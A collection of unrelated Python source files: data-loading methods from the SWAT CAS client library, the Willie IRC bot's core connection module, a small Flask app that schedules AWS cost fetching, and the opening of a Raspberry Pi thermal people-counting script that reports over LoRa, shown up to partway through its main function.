:class:`CASTable`
'''
return self._read_any('read_sql_query', sql, con, casout=casout, **kwargs)
def read_sql(self, sql, con, casout=None, **kwargs):
'''
Read SQL query or database table into a CAS table
This method calls :func:`pandas.read_sql` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed or table name.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql`
:meth:`read_sql_table`
:meth:`read_sql_query`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql', sql, con, casout=casout, **kwargs)
def read_gbq(self, query, casout=None, **kwargs):
'''
Load data from a Google BigQuery into a CAS table
This method calls :func:`pandas.read_gbq` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
query : string
SQL-like query to return data values.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_gbq`.
See Also
--------
:func:`pandas.read_gbq`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_gbq', query, casout=casout, **kwargs)
def read_stata(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read Stata file into a CAS table
This method calls :func:`pandas.read_stata` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or file-like object containing data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_stata`.
See Also
--------
:func:`pandas.read_stata`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_stata', filepath_or_buffer, casout=casout, **kwargs)
def path_to_caslib(self, path, name=None, **kwargs):
'''
Return a caslib name for a given path
If a caslib does not exist for the current path or for a parent
path, a new caslib will be created.
Parameters
----------
path : string
The absolute path to the desired caslib directory
name : string, optional
The name to give to the caslib, if a new one is created
kwargs : keyword-parameter, optional
Additional parameters to use when creating a new caslib
Returns
-------
( caslib-name, relative-path )
The return value is a two-element tuple. The first element
is the name of the caslib. The second element is the relative
path to the requested directory from the caslib. The second
element will be blank if the given path matches a caslib,
or a new caslib is created.
'''
if not name:
name = 'Caslib_%x' % random.randint(0, 10**9)
activeonadd_key = None
subdirectories_key = None
datasource_key = None
for key, value in kwargs.items():
if key.lower() == 'activeonadd':
activeonadd_key = key
elif key.lower() == 'subdirectories':
subdirectories_key = key
elif key.lower() == 'datasource':
datasource_key = key
if not activeonadd_key:
activeonadd_key = 'activeonadd'
kwargs[activeonadd_key] = False
if not subdirectories_key:
subdirectories_key = 'subdirectories'
kwargs[subdirectories_key] = True
if not datasource_key:
datasource_key = 'datasource'
kwargs[datasource_key] = dict(srctype='path')
is_windows = self.server_type.startswith('win')
if is_windows:
sep = '\\'
normpath = path.lower()
else:
sep = '/'
normpath = path
if normpath.endswith(sep):
normpath = normpath[:-1]
info = self.retrieve('table.caslibinfo',
_messagelevel='error')['CASLibInfo']
for libname, item, subdirs in zip(info['Name'], info['Path'],
info['Subdirs']):
if item.endswith(sep):
item = item[:-1]
if is_windows:
item = item.lower()
if item == normpath:
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, ''
elif normpath.startswith(item):
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, path[len(item) + 1:]
out = self.retrieve('table.addcaslib', _messagelevel='error',
name=name, path=path, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return name, ''
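# Illustrative sketch (hypothetical paths): if an existing caslib already
# points at /data, requesting a subdirectory reuses it and returns the
# relative part of the path:
# >>> name, relpath = conn.path_to_caslib('/data/projects/iris')
# >>> print(name, relpath)   # e.g. ('MYLIB', 'projects/iris')
# When no caslib covers the path, a new 'Caslib_<hex>' caslib is added and
# the relative path comes back as ''.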
def getone(connection, datamsghandler=None):
'''
Get a single response from a connection
Parameters
----------
connection : :class:`CAS` object
The connection/CASAction to get the response from.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> print(getone(conn))
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
output = None, connection
# enable data messages as needed
if datamsghandler is not None:
errorcheck(connection._sw_connection.enableDataMessages(),
connection._sw_connection)
_sw_message = errorcheck(connection._sw_connection.receive(),
connection._sw_connection)
if _sw_message:
mtype = _sw_message.getType()
if mtype == 'response':
_sw_response = errorcheck(_sw_message.toResponse(
connection._sw_connection), _sw_message)
if _sw_response is not None:
output = CASResponse(_sw_response, connection=connection), connection
elif mtype == 'request' and datamsghandler is not None:
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = datamsghandler(req, connection)
elif mtype == 'request':
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = req, connection
if datamsghandler is not None:
errorcheck(connection._sw_connection.disableDataMessages(),
connection._sw_connection)
# Raise exception as needed
if isinstance(output[0], CASResponse):
exception_on_severity = get_option('cas.exception_on_severity')
if exception_on_severity is not None and \
output[0].disposition.severity >= exception_on_severity:
raise SWATCASActionError(output[0].disposition.status, output[0], output[1])
return output
def getnext(*objs, **kwargs):
'''
Return responses as they appear from multiple connections
Parameters
----------
*objs : :class:`CAS` objects and/or :class:`CASAction` objects
Connection/CASAction objects to watch for responses.
timeout : int, optional
Timeout for waiting for a response on each connection.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn1 = swat.CAS()
>>> conn2 = swat.CAS()
>>> conn1.invoke('serverstatus')
>>> conn2.invoke('userinfo')
>>> for resp in getnext(conn1, conn2):
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
timeout = kwargs.get('timeout', 0)
datamsghandler = kwargs.get('datamsghandler')
if len(objs) == 1 and isinstance(objs[0], (list, tuple, set)):
connections = list(objs[0])
else:
connections = list(objs)
# if the item is a CASAction, use its connection
for i, conn in enumerate(connections):
if isinstance(conn, CASAction):
conn.invoke()
connections[i] = conn.get_connection()
# TODO: Set timeouts; check for mixed connection types
if isinstance(connections[0]._sw_connection, rest.REST_CASConnection):
for item in connections:
yield getone(item)
return
_sw_watcher = errorcheck(
clib.SW_CASConnectionEventWatcher(len(connections), timeout,
a2n(connections[0]._soptions), connections[0]._sw_error),
connections[0]._sw_error)
for item in connections:
errorcheck(_sw_watcher.addConnection(item._sw_connection), _sw_watcher)
try:
while True:
i = errorcheck(_sw_watcher.wait(), _sw_watcher)
# finished
if i == -2:
break
# timeout / retry
if i == -1:
yield [], None
yield getone(connections[i], datamsghandler=datamsghandler)
except (KeyboardInterrupt, SystemExit):
for conn in connections:
errorcheck(conn._sw_connection.stopAction(), conn._sw_connection)
raise
def dir_actions(obj):
''' Return list of CAS actionsets / actions associated with the object '''
if hasattr(obj, '__dir_actions__'):
return obj.__dir_actions__()
return []
def dir_members(obj):
''' Return list of members not including associated CAS actionsets / actions '''
if hasattr(obj, '__dir_members__'):
return obj.__dir_members__()
return dir(obj)
|
irc.py
|
# coding=utf-8
"""
irc.py - A Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Willie: http://willie.dftba.net/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from willie.logger import get_logger
from willie.tools import stderr, Identifier
from willie.trigger import PreTrigger, Trigger
try:
import select
import ssl
if not hasattr(ssl, 'match_hostname'):
# Attempt to import ssl_match_hostname from python-backports
import backports.ssl_match_hostname
ssl.match_hostname = backports.ssl_match_hostname.match_hostname
ssl.CertificateError = backports.ssl_match_hostname.CertificateError
has_ssl = True
except ImportError:
# no SSL support
has_ssl = False
import errno
import threading
from datetime import datetime
if sys.version_info.major >= 3:
unicode = str
LOGGER = get_logger(__name__)
class Bot(asynchat.async_chat):
def __init__(self, config):
ca_certs = config.core.ca_certs
asynchat.async_chat.__init__(self)
self.set_terminator(b'\n')
self.buffer = ''
self.nick = Identifier(config.core.nick)
"""Willie's current ``Identifier``. Changing this while Willie is running is
untested."""
self.user = config.core.user
"""Willie's user/ident."""
self.name = config.core.name
"""Willie's "real name", as used for whois."""
self.channels = []
"""The list of channels Willie is currently in."""
self.stack = {}
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
# Right now, only accounting for two op levels.
# This might be expanded later.
# These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their voices,
half-ops and ops.
"""
# We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
# Work around bot.connecting missing in Python older than 2.7.4
if not hasattr(self, "connecting"):
self.connecting = False
def log_raw(self, line, prefix):
"""Log raw line to the raw log."""
if not self.config.core.log_raw:
return
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception as e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Willie again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
"""Remove newlines from a string."""
if sys.version_info.major >= 3 and isinstance(string, bytes):
string = string.decode('utf8')
elif sys.version_info.major < 3:
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
string = string.replace('\n', '')
string = string.replace('\r', '')
return string
def write(self, args, text=None):
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``willie.write(('PRIVMSG',), 'Hello, world!')``
and ``willie.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
# From RFC2812 Internet Relay Chat: Client Protocol
# Section 2.3
#
# https://tools.ietf.org/html/rfc2812.html
#
# IRC messages are always lines of characters terminated with a
# CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
# NOT exceed 512 characters in length, counting all characters
# including the trailing CR-LF. Thus, there are 510 characters
# maximum allowed for the command and its parameters. There is no
# provision for continuation of message lines.
if text is not None:
temp = (' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = ' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
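# Illustrative sketch (mirrors the docstring example): both calls below put
# "PRIVMSG #channel :Hello, world!\r\n" on the wire, after newline removal
# and truncation of the joined message to 510 characters:
# >>> bot.write(('PRIVMSG', '#channel'), 'Hello, world!')
# >>> bot.write(('PRIVMSG', '#channel', ':Hello, world!'))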
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error as e:
stderr('Connection error: %s' % e)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_host else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
stderr('SSL is not available on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print('KeyboardInterrupt')
self.quit('KeyboardInterrupt')
def quit(self, message):
"""Disconnect from IRC and close the bot."""
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
# release the main thread, which is problematic because whomever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
# will release the main thread. This should be called last to avoid
# race conditions.
self.close()
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
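# Illustrative sketch: because a space in `channel` is treated as separating
# the channel from its key, these two calls send the same JOIN command:
# >>> bot.join('#private secretkey')
# >>> bot.join('#private', 'secretkey')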
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
else:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
try:
ssl.match_hostname(self.ssl.getpeercert(), self.config.core.host)
except ssl.CertificateError:
stderr("Invalid certficate, hostname mismatch!")
os.unlink(self.config.core.pid_file_path)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
# CAP * LS (which we handle in coretasks). v2 servers will respond with
# 421 Unknown command, which we'll ignore
self.write(('CAP', 'LS'))
if self.config.core.auth_method == 'server':
password = self.config.core.auth_password
self.write(('PASS', password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while self.connected or self.connecting:
if (datetime.now() - self.last_ping_time).seconds > int(self.config.core.timeout):
stderr('Ping timeout reached after %s seconds, closing connection' % self.config.core.timeout)
self.handle_close()
break
else:
time.sleep(int(self.config.core.timeout))
def _send_ping(self):
while self.connected or self.connecting:
if self.connected and (datetime.now() - self.last_ping_time).seconds > int(self.config.core.timeout) / 2:
try:
self.write(('PING', self.config.core.host))
except socket.error:
pass
time.sleep(int(self.config.core.timeout) / 2)
def _ssl_send(self, data):
"""Replacement for self.send() during SSL connections."""
try:
result = self.socket.send(data)
return result
except ssl.SSLError as why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise why
return 0
def _ssl_recv(self, buffer_size):
"""Replacement for self.recv() during SSL connections.
From: http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat
"""
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError as why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = ''
self.last_ping_time = datetime.now()
pretrigger = PreTrigger(self.nick, line)
if pretrigger.event == 'PING':
self.write(('PONG', pretrigger.args[-1]))
elif pretrigger.event == 'ERROR':
LOGGER.error("ERROR recieved from server: %s", pretrigger.args[-1])
if self.hasquit:
self.close_when_done()
elif pretrigger.event == '433':
stderr('Nickname already in use!')
self.handle_close()
self.dispatch(pretrigger)
def dispatch(self, pretrigger):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to account for the bot's
# hostmask, which is hard.
max_text_length = 400
# Encode to bytes, for proper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' '.encode('utf-8'), 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.7 seconds + penalty
recipient_id = Identifier(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.7 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we're about to send was repeated at least 5 times in the
# last 2 minutes, replace with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
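# Illustrative sketch (long_reply is a hypothetical string): with
# max_messages=2 a reply longer than ~400 bytes is split on the last space
# before the limit, the first chunk is sent with the flood-protection delay
# above, and the remainder goes out through the recursive call:
# >>> bot.msg('#channel', long_reply, max_messages=2)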
def notice(self, dest, text):
"""Send an IRC NOTICE to a user or a channel.
See IRC protocol documentation for more information.
"""
self.write(('NOTICE', dest), text)
def error(self, trigger=None):
"""Called internally when a module causes an error."""
try:
trace = traceback.format_exc()
if sys.version_info.major < 3:
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(self.config.core.logdir, 'exceptions.log')
with codecs.open(log_filename, 'a', encoding='utf-8') as logfile:
logfile.write('Signature: %s\n' % signature)
if trigger:
logfile.write('from {} at {}. Message was: {}\n'.format(
trigger.nick, str(datetime.now()), trigger.group(0)))
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
LOGGER.error("Could not save traceback from %s to file: %s", trigger.sender, str(e))
if trigger:
self.msg(trigger.sender, signature)
except Exception as e:
if trigger:
self.msg(trigger.sender, "Got an error.")
LOGGER.error("Exception from %s: %s", trigger.sender, str(e))
def handle_error(self):
"""Handle any uncaptured error in the core.
Overrides asyncore's handle_error.
"""
trace = traceback.format_exc()
stderr(trace)
LOGGER.error('Fatal error in core, please review exception log')
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.core.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
print >> sys.stderr, "Too many errors, can't continue"
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
# Helper functions to maintain the oper list.
# They cast to Identifier when adding to be quite sure there aren't any accidental
# string nicks. On deletion, you know you'll never need to worry about what
# the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Identifier):
self.ops[channel].add(name)
else:
self.ops[channel].add(Identifier(name))
def add_halfop(self, channel, name):
if isinstance(name, Identifier):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Identifier(name))
def add_voice(self, channel, name):
if isinstance(name, Identifier):
self.voices[channel].add(name)
else:
self.voices[channel].add(Identifier(name))
def del_op(self, channel, name):
self.ops[channel].discard(Identifier(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Identifier(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Identifier(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if channel not in self.halfplus:
self.halfplus[channel] = set()
if channel not in self.ops:
self.ops[channel] = set()
if channel not in self.voices:
self.voices[channel] = set()
|
app.py
|
import os
import sys
import time
from multiprocessing import Process
from datetime import datetime
from flask import render_template
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '.'))
from auth import auth_bp
from admin import admin_bp, fetch_instances_cost_from_aws
from user_blueprint import user_bp
from settings import app, db
# Registering blueprints
app.register_blueprint(auth_bp)
app.register_blueprint(admin_bp)
app.register_blueprint(user_bp)
@app.route('/')
def index():
return render_template('login.html')
def fetch_bill_from_aws(duration=86400):
while True:
fetch_instances_cost_from_aws()
delay = duration + int(time.time() / duration) * duration - time.time()
print("Going to sleep for %s seconds" % delay)
time.sleep(delay)
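# Illustrative sketch of the sleep arithmetic (hypothetical clock value):
# with duration=86400 and time.time() == 86400*k + 3600 (one hour into the
# day), delay = 86400 + 86400*k - (86400*k + 3600) = 82800, so the next
# fetch_instances_cost_from_aws() call lands on the next day boundary.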
def bill_scheduler():
process = Process(target=fetch_bill_from_aws, args=(86400, ))
process.start()
bill_scheduler()
if __name__ == '__main__':
db.init_app(app)
app.run()
|
thermal_tracker.py
|
import pygame
import os
import math
import time
from datetime import datetime, date
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import argparse
import busio
import board
import adafruit_amg88xx
import json
import gpsd
import threading
import sys
import RPi.GPIO as GPIO
from dragino import Dragino
import logging
from trackableobject import TrackableObject
# some utility functions
def constrain(val, min_val, max_val):
return min(max_val, max(min_val, val))
def map_value(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
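# Illustrative examples (not in the original source): map_value() is a plain linear
# rescale and constrain() clamps to a range, e.g.
#   map_value(30, 20, 40, 0, 7)  -> (30 - 20) * (7 - 0) / (40 - 20) + 0 = 3.5
#   constrain(9.2, 0, 7)         -> 7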
def send_lora(delay):
global payload
GPIO.setwarnings(False)
D = Dragino("dragino.ini.default", logging_level=logging.DEBUG)
while True:
while not D.registered():
print("Waiting")
time.sleep(2)
D.send(json.dumps(payload))
print("Sent message")
time.sleep(delay)
def count_within_range(list1, l, r):
'''
Helper function to count how many numbers in list1 falls into range [l,r]
'''
c = 0
# traverse in the list1
for x in list1:
# condition check
if x >= l and x <= r:
c += 1
return c
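# Illustrative example (not in the original source):
#   count_within_range([1, 4, 6, 9], 3, 7) -> 2   (only 4 and 6 fall in [3, 7])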
# a - latitude
# o - longitude
# c - count
payload = {'a': 0, 'o': 0, 'c': 0}
def main():
global payload
# argument parsing
parser = argparse.ArgumentParser()
parser.add_argument(
'--headless', help='run the pygame headlessly', action='store_true')
parser.add_argument(
"--color_depth", help="integer number of colors to use to draw temps", type=int)
parser.add_argument(
'--max_temp', help='initial max temperature', type=int)
parser.add_argument(
'--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
parser.add_argument(
'--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
parser.add_argument(
'--blob_min_threshold', help='blob detection min threshold', type=int)
parser.add_argument(
'--blob_max_threshold', help='blob detection max threshold', type=int)
parser.add_argument(
'--blob_filterbyarea', help='blob detection filter by area', action='store_true')
parser.add_argument(
'--blob_min_area', help='blob detection filter by area min area', type=int)
parser.add_argument(
'--blob_filterbycircularity', help='blob detection filter by circularity', action='store_true')
parser.add_argument(
'--blob_min_circularity', help='blob detection filter by circularity min circularity', type=float)
parser.add_argument(
'--blob_filterbyconvexity', help='blob detection filter by convexity', action='store_true')
parser.add_argument(
'--blob_min_convexity', help='blob detection filter by convexity min convexity', type=float)
parser.add_argument(
'--blob_filterbyinertia', help='blob detection filter by inertia', action='store_true')
parser.add_argument(
'--blob_min_inertiaratio', help='blob detection filter by inertia min inertia ratio', type=float)
parser.add_argument(
'--lora_send_interval', help='length of intervals between attempted lora uplinks in seconds', type=int)
args = parser.parse_args()
print(args)
i2c_bus = busio.I2C(board.SCL, board.SDA)
COLOR_DEPTH = args.color_depth
MAX_TEMP = args.max_temp
AMBIENT_OFFSET = args.ambient_offset
AMBIENT_TIME = args.ambient_time
BLOB_MIN_THRESHOLD = args.blob_min_threshold
BLOB_MAX_THRESHOLD = args.blob_max_threshold
BLOB_FILTERBYAREA = args.blob_filterbyarea
BLOB_MIN_AREA = args.blob_min_area
BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
BLOB_MIN_CIRCULARITY = args.blob_min_circularity
BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
BLOB_MIN_CONVEXITY = args.blob_min_convexity
BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
LORA_SEND_INTERVAL = args.lora_send_interval
if args.headless:
os.putenv('SDL_VIDEODRIVER', 'dummy')
else:
os.putenv('SDL_FBDEV', '/dev/fb1')
pygame.init()
# initialize the sensor
sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
# sensor is an 8x8 grid so lets do a square
height = 240
width = 240
# the list of colors we can choose from
black = Color("black")
colors = list(black.range_to(Color("white"), COLOR_DEPTH))
# create the array of colors
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
for c in colors]
displayPixelWidth = width / 30
displayPixelHeight = height / 30
lcd = pygame.display.set_mode((width, height))
lcd.fill((255, 0, 0))
pygame.display.update()
pygame.mouse.set_visible(False)
lcd.fill((0, 0, 0))
pygame.display.update()
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
if BLOB_MIN_THRESHOLD:
params.minThreshold = BLOB_MIN_THRESHOLD
if BLOB_MAX_THRESHOLD:
params.maxThreshold = BLOB_MAX_THRESHOLD
# Filter by Area.
if BLOB_FILTERBYAREA:
params.filterByArea = BLOB_FILTERBYAREA
params.minArea = BLOB_MIN_AREA
# Filter by Circularity
if BLOB_FILTERBYCIRCULARITY:
params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
params.minCircularity = BLOB_MIN_CIRCULARITY
# Filter by Convexity
if BLOB_FILTERBYCONVEXITY:
params.filterByConvexity = BLOB_FILTERBYCONVEXITY
params.minConvexity = BLOB_MIN_CONVEXITY
# Filter by Inertia
if BLOB_FILTERBYINERTIA:
params.filterByInertia = BLOB_FILTERBYINERTIA
params.minInertiaRatio = BLOB_MIN_INERTIARATIO
# Set up the detector with default parameters.
detector = cv2.SimpleBlobDetector_create(params)
# initialize centroid tracker
ct = CentroidTracker()
# a dictionary to map each unique object ID to a TrackableObject
trackableObjects = {}
# the total number of objects that have moved either up or down
total_down = 0
total_up = 0
total_down_old = 0
total_up_old = 0
# let the sensor initialize
time.sleep(.1)
# press key to exit
screencap = True
# array to hold mode of last 10 minutes of temperatures
mode_list = []
